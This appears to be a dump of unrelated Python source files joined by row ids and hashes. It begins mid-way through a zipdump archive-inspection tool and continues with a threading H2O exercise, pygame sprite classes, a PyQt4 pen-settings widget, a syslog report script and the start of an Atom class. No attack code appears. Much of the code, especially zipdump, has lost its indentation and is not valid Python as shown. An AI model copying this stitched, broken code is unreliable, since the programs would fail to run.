    datetime. An all-zero or invalid date falls back to the DOS epoch
    (1980-01-01); seconds carry 2-second granularity, as stored in zip
    headers.
    """
    datepart, timepart = ts >> 16, ts & 0xFFFF

    if datepart == 0:
        base = datetime.datetime(1980, 1, 1)
    else:
        y, m, d = (datepart >> 9) + 1980, (datepart >> 5) & 15, datepart & 31
        try:
            base = datetime.datetime(y, m, d)
        except Exception:
            print("error decoding date %d-%d-%d" % (y, m, d))
            base = datetime.datetime(1980, 1, 1)

    return base + datetime.timedelta(
        hours=timepart >> 11,
        minutes=(timepart >> 5) & 63,
        seconds=(timepart & 31) * 2,
    )
######################################################
# Decoder classes
######################################################
class CentralDirEntry(EntryBase):
HeaderSize = 42
MagicNumber = b'\x01\x02'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.createVersion, self.neededVersion, self.flags, self.method, self.timestamp, \
self.crc32, self.compressedSize, self.originalSize, self.nameLength, self.extraLength, \
self.commentLength, self.diskNrStart, self.zipAttrs, self.osAttrs, self.dataOfs = \
struct.unpack_from("<4H4L5HLL", data, ofs)
ofs += self.HeaderSize
self.nameOffset = baseofs + ofs
ofs += self.nameLength
self.extraOffset = baseofs + ofs
ofs += self.extraLength
self.commentOffset = baseofs + ofs
ofs += self.commentLength
self.endOffset = baseofs + ofs
self.name = None
self.extra = None
self.comment = None
def loaditems(self, fh):
fh.seek(self.nameOffset)
self.name = decode_name(fh.read(self.nameLength))
fh.seek(self.extraOffset)
self.extra = fh.read(self.extraLength)
fh.seek(self.commentOffset)
self.comment = fh.read(self.commentLength).decode("utf-8", "ignore")
def summary(self):
def flagdesc(fl):
if fl&64: return "AES"
if fl&1: return "CRYPT"
return ""
return "%10d (%5.1f%%) %s %08x [%5s] %s" % (
self.originalSize,
100.0*self.compressedSize/self.originalSize if self.originalSize else 0,
decodedatetime(self.timestamp),
self.crc32,
flagdesc(self.flags),
self.name
)
def __repr__(self):
r = "PK.0102: %04x %04x %04x %04x %08x %08x %08x %08x %04x %04x %04x %04x %04x %08x %08x | %08x %08x %08x %08x" % (
self.createVersion, self.neededVersion, self.flags, self.method, self.timestamp,
self.crc32, self.compressedSize, self.originalSize, self.nameLength, self.extraLength,
self.commentLength, self.diskNrStart, self.zipAttrs, self.osAttrs, self.dataOfs,
self.nameOffset, self.extraOffset, self.commentOffset, self.endOffset)
if self.name:
r += " - " + self.name
return r
class LocalFileHeader(EntryBase):
HeaderSize = 26
MagicNumber = b'\x03\x04'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.neededVersion, self.flags, self.method, self.timestamp, self.crc32, \
self.compressedSize, self.originalSize, self.nameLength, self.extraLength = \
struct.unpack_from("<3H4LHH", data, ofs)
ofs += self.HeaderSize
self.nameOffset = baseofs + ofs
ofs += self.nameLength
self.extraOffset = baseofs + ofs
ofs += self.extraLength
self.dataOffset = baseofs + ofs
ofs += self.compressedSize
self.endOffset = baseofs + ofs
self.name = None
self.extra = None
self.data = None
def loaditems(self, fh):
fh.seek(self.nameOffset)
self.name = decode_name(fh.read(self.nameLength))
fh.seek(self.extraOffset)
self.extra = fh.read(self.extraLength)
# not loading data
def __repr__(self):
r = "PK.0304: %04x %04x %04x %08x %08x %08x %08x %04x %04x | %08x %08x %08x %08x" % (
self.neededVersion, self.flags, self.method, self.timestamp, self.crc32,
self.compressedSize, self.originalSize, self.nameLength, self.extraLength,
self.nameOffset, self.extraOffset, self.dataOffset, self.endOffset)
if self.name:
r += " - " + self.name
return r
class EndOfCentralDir(EntryBase):
HeaderSize = 18
MagicNumber = b'\x05\x06'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.thisDiskNr, self.startDiskNr, self.thisEntries, self.totalEntries, self.dirSize, self.dirOffset, self.commentLength = \
struct.unpack_from("<4HLLH", data, ofs)
ofs += self.HeaderSize
self.commentOffset = baseofs + ofs
ofs += self.commentLength
self.endOffset = baseofs + ofs
self.comment = None
def loaditems(self, fh):
if not self.commentLength:
return
fh.seek(self.commentOffset)
self.comment = fh.read(self.commentLength)
if self.comment.startswith(b'signed by SignApk'):
self.comment = repr(self.comment[:17]) + str(binascii.b2a_hex(self.comment[18:]), 'ascii')
else:
self.comment = self.comment.decode('utf-8', 'ignore')
def summary(self):
if self.thisEntries==self.totalEntries:
r = "EOD: %d entries" % (self.totalEntries)
else:
r = "Spanned archive %d .. %d ( %d of %d entries )" % (self.startDiskNr, self.thisDiskNr, self.thisEntries, self.totalEntries)
r += ", %d byte directory" % self.dirSize
return r
def __repr__(self):
r = "PK.0506: %04x %04x %04x %04x %08x %08x %04x | %08x %08x" % (
self.thisDiskNr, self.startDiskNr, self.thisEntries, self.totalEntries, self.dirSize, self.dirOffset, self.commentLength,
self.commentOffset, self.endOffset)
return r
class DataDescriptor(EntryBase):
HeaderSize = 12
MagicNumber = b'\x07\x08'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.crc, self.compSize, self.uncompSize = \
struct.unpack_from("<3L", data, ofs)
ofs += self.HeaderSize
self.endOffset = baseofs + ofs
def __repr__(self):
return "PK.0708: %08x %08x %08x | %08x" % (
self.crc, self.compSize, self.uncompSize,
self.endOffset)
# todo
class Zip64EndOfDir(EntryBase):
HeaderSize = 0
MagicNumber = b'\x06\x06'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class Zip64EndOfDirLocator(EntryBase):
HeaderSize = 0
MagicNumber = b'\x06\x07'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class ExtraEntry(EntryBase):
HeaderSize = 0
MagicNumber = b'\x06\x08'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class SpannedArchive(EntryBase):
HeaderSize = 0
MagicNumber = b'\x03\x03'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class ArchiveSignature(EntryBase):
HeaderSize = 0
MagicNumber = b'\x05\x05'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
def getDecoderClass(typ):
    """ Return the decoder class whose MagicNumber matches `typ`, or None. """
    decoders = (CentralDirEntry, LocalFileHeader, EndOfCentralDir, DataDescriptor,
                Zip64EndOfDir, Zip64EndOfDirLocator, ExtraEntry, SpannedArchive,
                ArchiveSignature)
    return next((cls for cls in decoders if cls.MagicNumber == typ), None)
def findPKHeaders(args, fh):
""" Scan the entire file for PK headers. """
def processchunk(o, chunk):
n = -1
while True:
n = chunk.find(b'PK', n+1)
if n == -1 or n+4 > len(chunk):
break
cls = getDecoderClass(chunk[n+2:n+4])
if cls:
hdrEnd = n+4+cls.HeaderSize
if hdrEnd > len(chunk):
continue
# todo: skip entries entirely within repeated chunk
# if n<64 and hdrEnd>64:
# continue
yield cls(o, chunk, n+4)
prev = b''
o = 0
if args.offset:
fh.seek(args.offset, os.SEEK_SET if args.offset >= 0 else os.SEEK_END)
o = args.offset
while args.length is None or o < args.length:
want = args.chunksize
if args.length is not None and want > args.length - o:
want = args.length - o
fh.seek(o)
chunk = fh.read(want)
if len(chunk) == 0:
break
for ch in processchunk(o-len(prev), prev+chunk):
yield ch
# 64 so all header types would fit, exclusive their variable size parts
prev = chunk[-64:]
o += len(chunk)
def quickScanZip(args, fh):
""" Do a quick scan of the .zip file, starting by locating the EOD marker. """
# 100 bytes is the smallest .zip possible
fh.seek(0, 2)
fsize = fh.tell()
if fsize==0:
print("Empty file")
return
if fsize<100:
print("Zip too small: %d bytes, minimum zip is 100 bytes" % fsize)
return
fh.seek(-100, 2)
eoddata = fh.read()
iEND = eoddata.find(b'PK\x05\x06')
if iEND==-1:
# try with larger chunk
ofs = max(fh.tell()-0x10100, 0)
fh.seek(ofs, 0)
eoddata = fh.read()
iEND = eoddata.find(b'PK\x05\x06')
if iEND==-1:
print("expected PK0506 - probably not a PKZIP file")
return
else:
ofs = fh.tell()-0x100
eod = EndOfCentralDir(ofs, eoddata, iEND+4)
yield eod
dirofs = eod.dirOffset
for _ in range(eod.thisEntries):
fh.seek(dirofs)
dirdata = fh.read(46)
if dirdata[:4] != b'PK\x01\x02':
print("expected PK0102")
return
dirent = CentralDirEntry(dirofs, dirdata, 4)
yield dirent
dirofs = dirent.endOffset
def zipraw(fh, ent):
if isinstance(ent, CentralDirEntry):
# find LocalFileHeader
fh.seek(ent.dataOfs)
data = fh.read(4+LocalFileHeader.HeaderSize)
dirent = ent
ent = LocalFileHeader(ent.dataOfs, data, 4)
ent.loaditems(fh)
fh.seek(ent.dataOffset)
nread = 0
while nread < ent.compressedSize:
want = min(ent.compressedSize-nread, 0x10000)
block = fh.read(want)
if len(block)==0:
break
yield block
nread += len(block)
def blockdump(baseofs, blks):
    """Hexdump each block from `blks`, prefixing lines with the absolute
    file offset (starting at `baseofs`)."""
    o = baseofs
    for blk in blks:
        print("%08x: %s" % (o, binascii.b2a_hex(blk)))
        o += len(blk)
def zipcat(blks, ent):
    """
    Decompress a stream of raw data blocks according to the entry's
    compression method: 8 = deflate, 0 = stored. Unknown methods print a
    diagnostic and yield nothing.
    """
    if ent.method == 0:
        # stored: pass the blocks through untouched
        yield from blks
    elif ent.method == 8:
        # raw deflate stream (negative wbits: no zlib header/trailer)
        inflater = zlib.decompressobj(-15)
        for chunk in blks:
            yield inflater.decompress(chunk)
        yield inflater.flush()
    else:
        print("unknown compression method")
def namegenerator(name):
    """
    Yield `name` followed by collision-avoiding variants with a counter
    spliced in before the extension:
        dir/file.ext, dir/file-1.ext, dir/file-2.ext, ...
    """
    yield name
    dirpart, sep, base = name.rpartition('/')
    stem, dot, ext = base.rpartition('.')
    if not dot:
        # no extension at all: the whole basename is the stem
        stem, ext = base, ''
    prefix = dirpart + sep + stem
    suffix = dot + ext
    for counter in itertools.count(1):
        yield "%s-%d%s" % (prefix, counter, suffix)
def savefile(outdir, name, data):
    """
    Write `data` (an iterable of byte blocks) to outdir/name, creating
    intermediate directories and appending -1, -2, ... to the stem rather
    than overwriting an existing file.
    """
    os.makedirs(os.path.dirname(os.path.join(outdir, name)), exist_ok=True)
    # pick the first candidate name that does not yet exist
    for candidate in namegenerator(name):
        target = os.path.join(outdir, candidate)
        if not os.path.exists(target):
            break
    with open(target, "wb") as fh:
        fh.writelines(data)
def getbytes(fh, ofs, size):
    """Random-access read: return `size` bytes of `fh` starting at absolute offset `ofs`."""
    fh.seek(ofs)
    chunk = fh.read(size)
    return chunk
def processfile(args, fh):
""" Process one opened file / url. """
if args.quick:
scanner = quickScanZip(args, fh)
else:
scanner = findPKHeaders(args, fh)
def checkarg(arg, ent):
if not arg:
return False
return '*' in arg or ent.name in arg
def checkname(a, b):
if a and '*' in a: return True
if b and '*' in b: return True
l = 0
if a: l += len(a)
if b: l += len(b)
return l > 1
if args.verbose and not (args.cat or args.raw or args.save):
print(" 0304 need flgs mth stamp --crc-- compsize fullsize nlen xlen namofs xofs datofs endofs")
print(" 0102 crea need flgs mth stamp --crc-- compsize fullsize nlen xlen clen dsk0 attr osattr datptr namofs xofs cmtofs endofs")
for ent in scanner:
if args.cat or args.raw or args.save:
if args.quick and isinstance(ent, CentralDirEntry) or \
not args.quick and isinstance(ent, LocalFileHeader):
ent.loaditems(fh)
do_cat = checkarg(args.cat, ent)
do_raw = checkarg(args.raw, ent)
do_save= checkarg(args.save, ent)
do_name= checkname(args.cat, args.raw)
if do_name:
print("\n===> " + ent.name + " <===\n")
sys.stdout.flush()
blks = zipraw(fh, ent)
if args.password and ent.flags&1:
blks = zip_decrypt(blks, args.password)
if do_cat or do_save:
blks = skipbytes(blks, 12, args)
if do_cat:
sys.stdout.buffer.writelines(zipcat(blks, ent))
if do_raw:
sys.stdout.buffer.writelines(blks)
if do_save:
savefile(args.outputdir, ent.name, zipcat(blks, ent))
else:
ent.loaditems(fh)
if args.verbose or not args.quick:
print("%08x: %s" % (ent.pkOffset, ent))
else:
print(ent.summary())
if hasattr(ent, "comment") and ent.comment and not args.dumpraw:
print(ent.comment)
if args.dumpraw and hasattr(ent, "extraLength") and ent.extraLength:
print("%08x: XTRA: %s" % (ent.extraOffset, binascii.b2a_hex(getbytes(fh, ent.extraOffset, ent.extraLength))))
if args.dumpraw and hasattr(ent, "comment") and ent.comment:
print("%08x: CMT: %s" % (ent.commentOffset, binascii.b2a_hex(getbytes(fh, ent.commentOffset, ent.commentLength))))
if args.dumpraw and isinstance(ent, LocalFileHeader):
blks = zipraw(fh, ent)
if args.password and ent.flags&1:
blks = zip_decrypt(blks, args.password)
blockdump(ent.dataOffset, blks)
def DirEnumerator(args, path):
"""
Enumerate all files / links in a directory,
optionally recursing into subdirectories,
or ignoring links.
"""
for d in os.scandir(path):
try:
if d.name == '.' or d.name == '..':
pass
elif d.is_symlink() and args.skiplinks:
pass
elif d.is_file():
yield d.path
elif d.is_dir() and args.recurse:
for f in DirEnumerator(args, d.path):
yield f
except Exception as e:
print("EXCEPTION %s accessing %s/%s" % (e, path, d.name))
def EnumeratePaths(args, paths):
"""
Enumerate all urls, paths, files from the commandline
optionally recursing into subdirectories.
"""
for fn in paths:
try:
# 3 - for ftp://, 4 for http://, 5 for https://
if fn.find("://") in (3,4,5):
yield fn
if os.path.islink(fn) and args.skiplinks:
pass
elif os.path.isdir(fn) and args.recurse:
for f in DirEnumerator(args, fn):
yield f
elif os.path.isfile(fn):
yield fn
except Exception as e:
print("EXCEPTION %s accessing %s" % (e, fn))
def main():
import argparse
parser = argparse.ArgumentParser(description='zipdump - scan file contents for PKZIP data',
epilog='zipdump can quickly scan a zip from an URL without downloading the complete archive')
parser.add_argument('--verbose', '-v', action='count')
parser.add_argument('--quiet', action='store_true')
parser.add_argument('--cat', '-c', nargs='*', type=str, help='decompress file(s) to stdout')
parser.add_argument('--raw', '-p', nargs='*', type=str, help='print raw compressed file(s) data to stdout')
parser.add_argument('--save', '-s', nargs='*', type=str, help='extract file(s) to the output directory')
parser.add_argument('--outputdir', '-d', type=str, help='the output directory, default = curdir', default='.')
parser.add_argument('--quick', '-q', action='store_true', help='Quick dir scan. This is quick with URLs as well.')
parser.add_argument('--recurse', '-r', action='store_true', help='recurse into directories')
parser.add_argument('--skiplinks', '-L', action='store_true', help='skip symbolic links')
parser.add_argument('--offset', '-o', type=int, help='start processing at offset')
parser.add_argument('--length', '-l', type=int, help='max length of data to process')
parser.add_argument('--chunksize', type=int, default=1024*1024)
parser.add_argument('--dumpraw', action='store_true', help='hexdump raw compressed data')
parser.add_argument('--password', type=str, help="Password for pkzip decryption")
parser.add_argument('--hexpassword', type=str, help="hexadecimal password for pkzip decryption")
parser.add_argument('--keys', type=str, help="internal key representation for pkzip decryption")
parser.add_argument('FILES', type=str, nargs='*', help='Files or URLs')
args = parser.parse_args()
use_raw = args.cat or args.raw or args.save
if args.hexpassword:
args.password = binascii.a2b_hex(args.hexpassword)
elif args.keys:
args.password = list(int(_, 0) for _ in args.keys.split(","))
elif args.password:
args.password = args.password.encode('utf-8')
if args.FILES:
for fn in EnumeratePaths(args, args.FILES):
if len(args.FILES)>1 and not args.quiet:
print("\n==> " + fn + " <==\n")
try:
if fn.find("://") in (3,4,5):
# when argument looks like a url, use urlstream to open
import urlstream
with urlstream.open(fn) as fh:
processfile(args, fh)
else:
with open(fn, "rb") as fh:
processfile(args, fh)
except Exception as e:
print("ERROR: %s" % e)
raise
else:
processfile(args, sys.stdin.buffer)
if __name__ == '__main__':
main()
|
996,140 | 632d44d0b4624b42f61953d1c08a7adcb74968cf | import threading
class H2O(object):
    """
    Synchronizer for the "building H2O" problem: threads calling hydrogen()
    and oxygen() are released only in complete H-H-O molecules.

    sema_h caps unpaired hydrogens at 2; every hydrogen signals sema_o, and
    an oxygen waits for two such signals before running and re-arming the
    two hydrogen slots. The lock serializes oxygens so two oxygens cannot
    each grab one of the same pair of hydrogen signals.

    BUGFIX: removed the class-level attributes that bound the *classes*
    threading.Semaphore / threading.Lock (not instances); they were dead
    and always shadowed by the instance attributes set in __init__.
    """
    def __init__(self):
        self.sema_h = threading.Semaphore(2)  # at most 2 unpaired hydrogens
        self.sema_o = threading.Semaphore(0)  # hydrogens waiting for an oxygen
        self.lock = threading.Lock()          # one oxygen assembles at a time

    def hydrogen(self, releaseHydrogen):
        """
        :type releaseHydrogen: method
        :rtype: void
        """
        self.sema_h.acquire()
        # releaseHydrogen() outputs "H". Do not change or remove this line.
        releaseHydrogen()
        self.sema_o.release()

    def oxygen(self, releaseOxygen):
        """
        :type releaseOxygen: method
        :rtype: void
        """
        self.lock.acquire(True)
        # wait until two hydrogens have run
        self.sema_o.acquire()
        self.sema_o.acquire()
        self.lock.release()
        # releaseOxygen() outputs "O". Do not change or remove this line.
        releaseOxygen()
        # re-open both hydrogen slots for the next molecule
        self.sema_h.release()
        self.sema_h.release()
def releaseOxygen():
    """Emit one 'O' atom to stdout."""
    # print() works identically under Python 2 and 3; the previous
    # `print "O"` statement form is a SyntaxError under Python 3.
    print("O")
def releaseHydrogen():
    """Emit one 'H' atom to stdout."""
    # print() works identically under Python 2 and 3; the previous
    # `print "H"` statement form is a SyntaxError under Python 3.
    print("H")
a = H2O()
# s = "OHOHOOHHOHHOOHHHHOOHOOHHOHHOOHHHOOHOHHOHHOHHHHHOHHHHHHHHHHHH"
s = "OOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHH"
for i in s:
if i == "H":
threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
else:
threading.Thread(target=a.oxygen, args=[releaseOxygen]).start()
# threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
# threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
# threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
# threading.Thread(target=a.oxygen, args=[releaseOxygen]).start()
|
996,141 | 1f12700b1abc97218bed3171ec9708c5d284243f | # Sprite classes for platform game
import pygame as pg
from settings import *
import random
vec = pg.math.Vector2
class Player(pg.sprite.Sprite):
    """Player-controlled bird sprite: gravity physics, tilt and frame animation."""

    def __init__(self, game, bird_sprites):
        pg.sprite.Sprite.__init__(self)
        self.game = game
        self.bird_sprites = bird_sprites
        # Index of the current animation frame in bird_sprites (cycled mod 4).
        self.sprite_frame = 0
        self.image_orig = self.bird_sprites[self.sprite_frame]
        self.image = self.image_orig
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.center = (WIDTH / 2, HEIGHT / 2)
        # Position/velocity/acceleration vectors; pos is mapped to rect.midbottom.
        self.pos = vec(15, HEIGHT / 2)
        self.vel = vec(0, 0)
        self.acc = vec(0, 0)
        #Rotation
        self.rot = 0 # rotation degree
        # Timestamp (ms) of the last animation frame switch.
        self.last_update = pg.time.get_ticks()
    def jump(self):
        # Flap: give an upward kick unless the bird is at the top of the screen.
        if self.pos.y > 25:
            self.vel.y = -PLAYER_JUMP
    def update(self):
        # Order matters: advance the animation frame first, then tilt that frame.
        # self.rotate()
        self.animate()
        self.rotate()
        self.acc = vec(0, PLAYER_GRAV)
        """keys = pg.key.get_pressed()
        if keys[pg.K_LEFT]:
            self.acc.x = -PLAYER_ACC
        if keys[pg.K_RIGHT]:
            self.acc.x = PLAYER_ACC"""
        self.acc.x = PLAYER_ACC
        # apply friction
        self.acc.x += self.vel.x * PLAYER_FRICTION
        # equations of motion
        self.vel += self.acc
        self.pos += self.vel + 0.5 * self.acc
        # wrap around the sides of the screen
        """if self.pos.x > WIDTH:
            self.pos.x = 0
        if self.pos.x < 0:
            self.pos.x = WIDTH"""
        self.rect.midbottom = self.pos
        # Rebuild the collision mask from the (possibly rotated) image.
        self.mask = pg.mask.from_surface(self.image)
    def rotate(self):
        """Tilt the current frame by the vertical velocity, clamped to -90 degrees."""
        self.rot = (self.vel.y * -3)
        if self.rot < -90:
            self.rot = -90
        new_image = pg.transform.rotate(self.bird_sprites[self.sprite_frame], self.rot)
        old_center = self.rect.center
        self.image = new_image
        # Re-centre: rotation changes the bounding rect size.
        self.rect = self.image.get_rect()
        self.rect.center = old_center
        # self.animate()
    def animate(self):
        # Advance to the next of the 4 frames every 100 ms.
        now = pg.time.get_ticks()
        if now - self.last_update > 100:
            self.last_update = now
            self.sprite_frame = (self.sprite_frame + 1)% 4
            self.image = self.bird_sprites[self.sprite_frame]
class Platform(pg.sprite.Sprite):
    """A stationary obstacle sprite anchored at a fixed (x, y) position."""

    def __init__(self, x, y, image):
        pg.sprite.Sprite.__init__(self)
        # Use the supplied surface directly and position its bounding rect.
        self.image = image
        rect = self.image.get_rect()
        rect.x, rect.y = x, y
        self.rect = rect
        # Set once the player has been credited for passing this platform.
        self.scored = False
class Spritesheet:
    """Utility class for loading a sheet image and slicing sprites out of it."""

    def __init__(self, filename):
        # Load the whole sheet once, preserving its alpha channel.
        self.spritesheet = pg.image.load(filename).convert_alpha()

    def get_image(self, x, y, width, height):
        """Copy the (x, y, width, height) region of the sheet, scaled 2x."""
        region = pg.Surface((width, height))
        region.blit(self.spritesheet, (0, 0), (x, y, width, height))
        scaled = pg.transform.scale(region, (width * 2, height * 2))
        scaled.set_colorkey(BLACK)
        return scaled
|
996,142 | 6d2fd7374e663bd98ba39ec80118f5c6fd96928e | '''
Created on 2016-08-11
@author: Sun Tianchen
'''
from PyQt4 import QtCore, QtGui
class ColorWidegt(QtGui.QWidget):
    """Pen-configuration widget: a colour dialog plus pen-size and tense sliders,
    each mirrored by a line edit, with OK/Cancel buttons."""
    def __init__(self, parent=None):
        '''
        Build the widget tree and wire the slider/line-edit synchronisation.
        Defaults: color (79,106,25), size 5 px, tense 0.4.
        '''
        QtGui.QWidget.__init__(self, parent=parent)
        # Named handles for the interactive controls, exposed to callers.
        self.buttons = {}
        self.gridLayout = QtGui.QGridLayout(self)
        # Embed the colour dialog as an ordinary child widget (no buttons).
        self.cd = QtGui.QColorDialog()
        self.cd.setWindowFlags(QtCore.Qt.Widget)
        self.cd.setOptions(QtGui.QColorDialog.DontUseNativeDialog)
        self.cd.setOptions(QtGui.QColorDialog.NoButtons)
        self.gridLayout.addWidget(self.cd)
        self.hblayout = QtGui.QHBoxLayout()
        self.hblayout2 = QtGui.QHBoxLayout()
        self.hblayout3 = QtGui.QHBoxLayout()
        ## pen-size slider row (1..30 px)
        self.psSl = QtGui.QSlider(QtCore.Qt.Horizontal)
        self.psSl.setMinimum(1)
        self.psSl.setMaximum(30)
        self.psSl.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
        self.psLabel = QtGui.QLabel("Pen size")
        self.psText = QtGui.QLineEdit()
        self.psText.setValidator(QtGui.QIntValidator(1, 30, self.psText))
        self.psText.setMaximumWidth(30)
        self.psText.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
        self.psText.setText(str(self.psSl.value()))
        self.pxLabel = QtGui.QLabel("px")
        self.hblayout.addWidget(self.psLabel)
        self.hblayout.addWidget(self.psSl)
        self.hblayout.addWidget(self.psText)
        # NOTE(review): psLabel is added a second time here; Qt re-parents the
        # widget, so the label ends up after psText -- confirm this is intended.
        self.hblayout.addWidget(self.psLabel)
        #self.hblayout.addWidget(self.pxLabel)
        self.gridLayout.addLayout(self.hblayout, 1, 0, QtCore.Qt.AlignLeft)
        ## tense slider row (slider 30..70, displayed as 0.30..0.70)
        self.tsSl = QtGui.QSlider(QtCore.Qt.Horizontal)
        self.tsSl.setMinimum(30)
        self.tsSl.setMaximum(70)
        self.tsSl.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
        self.tsLabel = QtGui.QLabel("Tense")
        self.tsText = QtGui.QLineEdit()
        self.tsText.setValidator(QtGui.QDoubleValidator(0.3, 0.7, 2, self.tsText))
        self.tsText.setMaximumWidth(30)
        self.tsText.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
        # NOTE(review): shows the raw slider int (e.g. "30") although
        # ts_bar_changed later shows value/100 -- confirm the intended format.
        self.tsText.setText(str(self.tsSl.value()))
        # NOTE(review): the three tense widgets below are added to hblayout
        # (the pen-size row) while the empty hblayout2 is inserted into grid
        # row 2 -- these adds look like they should target hblayout2.
        self.hblayout.addWidget(self.tsLabel)
        self.hblayout.addWidget(self.tsSl)
        self.hblayout.addWidget(self.tsText)
        self.gridLayout.addLayout(self.hblayout2, 2, 0, QtCore.Qt.AlignLeft)
        ## OK / Cancel buttons
        self.okBtn = QtGui.QPushButton("OK")
        self.cancelBtn = QtGui.QPushButton("Cancel")
        self.okBtn.setMaximumWidth(50)
        self.cancelBtn.setMaximumWidth(50)
        self.hblayout3.addWidget(self.okBtn)
        self.hblayout3.addWidget(self.cancelBtn)
        self.gridLayout.addLayout(self.hblayout3, 3, 0)
        #self.setFixedSize(self.size())
        ## expose the controls by name
        self.buttons['cancel'] = self.cancelBtn
        self.buttons['ok'] = self.okBtn
        self.buttons['color'] = self.cd
        self.buttons['size'] = self.psSl
        self.buttons['tense'] = self.tsSl
        ## keep slider and line edit in sync, both directions
        self.psText.textEdited.connect(self.ps_line_text_changed)
        self.psSl.valueChanged.connect(self.ps_bar_changed)
        self.tsText.textEdited.connect(self.ts_line_text_changed)
        self.tsSl.valueChanged.connect(self.ts_bar_changed)
        ## last committed values, applied to the controls by restore_value()
        self.cur_color = QtGui.QColor(79,106,25)
        self.cur_tense = 0.4
        self.cur_size = 5
        self.restore_value()
    def ok_clicked(self):
        # Placeholder; wiring is presumably done by the owner of this widget.
        pass
    def cancel_click(self):
        # Placeholder; wiring is presumably done by the owner of this widget.
        pass
    def ps_bar_changed(self, value):
        # Slider -> line edit (pen size, raw int).
        self.psText.setText(str(value))
    def ps_line_text_changed(self):
        # Line edit -> slider (pen size).
        if len(self.psText.text()) > 0:
            self.psSl.setValue(int(self.psText.text()))
    def ts_bar_changed(self, value):
        # Slider -> line edit (tense, scaled from 30..70 to 0.30..0.70).
        self.tsText.setText(str(value/100.))
    def ts_line_text_changed(self):
        # Line edit -> slider (tense, scaled back to the int range).
        if len(self.tsText.text()) > 0:
            self.tsSl.setValue(int(float(self.tsText.text()) * 100))
    def set_cur_value(self):
        # Commit the current control states into cur_* (typically on OK).
        self.cur_color = self.buttons['color'].currentColor()
        self.cur_size = self.buttons['size'].value()
        self.cur_tense = self.buttons['tense'].value() / 100.
    def restore_value(self):
        ## color -- color Dialog
        ## size -- psSl, psText
        ## tense -- tsSl, tsText
        self.cd.setCurrentColor(self.cur_color)
        self.psSl.setValue(self.cur_size)
        self.psText.setText(str(self.cur_size))
        # NOTE(review): 100 * cur_tense is a float; PyQt converts it, but an
        # explicit int() would be clearer -- confirm before changing.
        self.tsSl.setValue(100 * self.cur_tense)
        self.tsText.setText(str(self.cur_tense))
# A QApplication must exist before any widget is constructed; created at import
# time so the demo code below (and interactive use) works.
app = QtGui.QApplication([])
'''
win = QtGui.QMainWindow()
win.setWindowTitle('pyqtgraph example')
cw = ColorWidegt()
cd = QtGui.QColorDialog()
cd.setOptions(QtGui.QColorDialog.DontUseNativeDialog)
cd.setOptions(QtGui.QColorDialog.NoButtons)
win.setCentralWidget(cd)
layout = QtGui.QGridLayout()
win.show()
'''
#cw = ColorWidegt()
#cw.show()
if __name__ == '__main__':
    import sys
    # Only start the Qt event loop when not already inside an interactive
    # session that runs its own loop (standard PyQt example idiom).
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        QtGui.QApplication.instance().exec_()
996,143 | 96c4ae9fe1ea9dc34a76fb5ed0c4b22c3446f54f | #!/usr/bin/env python3
import re
import csv
import operator
# error message text -> occurrence count
error_message={}
# username -> [INFO count, ERROR count]
user_statistics={}
# Captures the message after "ERROR "; usernames appear in parentheses.
pattern_error=r"ERROR ([\w ]+)"
pattern_username=r"\(([\w.]+)\)"
with open("syslog.log") as f:
    for line in f:
        result_user=re.search(pattern_username,line)
        # NOTE(review): raises AttributeError if a line has no "(user)" token;
        # assumes every syslog line matches -- confirm input format.
        result_user=str(result_user.group(1)).strip()
        if "ERROR" in line:
            result=re.search(pattern_error,line)
            # group() (not group(1)) keeps the leading "ERROR " prefix in the key.
            result=result.group()
            result=str(result).strip()
            if result in error_message:
                error_message[result] += 1
            else:
                error_message[result] = 1
            if result_user in user_statistics:
                user_statistics[result_user][1] += 1
            else:
                user_statistics[result_user] = [0,1]
        else:
            # Any non-ERROR line counts toward the user's INFO column.
            if result_user in user_statistics:
                user_statistics[result_user][0] += 1
            else:
                user_statistics[result_user] = [1,0]
# Flatten the dicts into row dicts for csv.DictWriter.
usr_stst=[]
err_msg=[]
for item in user_statistics:
    d={}
    d["Username"] = item
    d["INFO"] = user_statistics[item][0]
    d["ERROR"] = user_statistics[item][1]
    usr_stst.append(d)
# Errors sorted by frequency, most common first.
for item in sorted(error_message.items(), key = operator.itemgetter(1), reverse=True):
    d={}
    d["Error"] = item[0]
    d["Count"] = item[1]
    err_msg.append(d)
keys = ["Username", "INFO", "ERROR"]
with open("user_statistics.csv","w") as file:
    writer=csv.DictWriter(file,fieldnames=keys)
    writer.writeheader()
    writer.writerows(usr_stst)
keys = ["Error", "Count"]
with open("error_message.csv","w") as file:
    writer=csv.DictWriter(file,fieldnames=keys)
    writer.writeheader()
    writer.writerows(err_msg)
996,144 | 8fc8aa0e1c56212f3c1fbfead75e11c7d663ab15 | # Written by Christian Abdelmassih, Alexandra Runhem
class Atom():
